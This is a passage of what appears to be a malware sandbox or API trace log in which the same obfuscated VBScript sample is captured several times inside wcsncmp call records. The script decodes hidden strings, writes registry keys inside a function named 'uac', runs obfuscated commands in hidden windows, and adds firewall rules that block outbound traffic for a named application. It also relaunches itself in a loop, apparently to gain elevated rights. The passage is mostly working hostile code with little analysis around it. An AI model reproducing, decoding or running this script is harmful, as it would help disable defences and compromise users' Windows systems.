(fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.288] wcsncmp (_String1="= 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.289] wcsncmp (_String1=" 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.289] wcsncmp (_String1="10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.289] wcsncmp (_String1="0\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0226.289] wcsncmp (_String1="\r\nFunction 